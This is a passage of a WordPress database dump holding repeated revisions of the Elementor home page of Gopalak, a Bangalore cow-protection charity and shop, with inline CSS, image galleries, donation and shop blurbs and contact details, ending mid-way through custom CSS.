.elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:04:18','2022-10-20 11:34:18','',1373,'https://gopalak.in/?p=1935',0,'revision','',0),(1936,1,'2022-10-20 17:04:55','2022-10-20 11:34:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:04:55','2022-10-20 11:34:55','',1373,'https://gopalak.in/?p=1936',0,'revision','',0),(1937,1,'2022-10-20 17:04:55','2022-10-20 11:34:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:04:55','2022-10-20 11:34:55','',1373,'https://gopalak.in/?p=1937',0,'revision','',0),(1938,1,'2022-10-20 17:04:55','2022-10-20 11:34:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:04:55','2022-10-20 11:34:55','',1373,'https://gopalak.in/?p=1938',0,'revision','',0),(1940,1,'2022-10-20 17:06:09','2022-10-20 11:36:09','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFE71;\n}\n#page {\n	background-color: #D5EBC1;\n}\n#site-header {	\n	background:#c7f6b6;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #c7f6b6;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 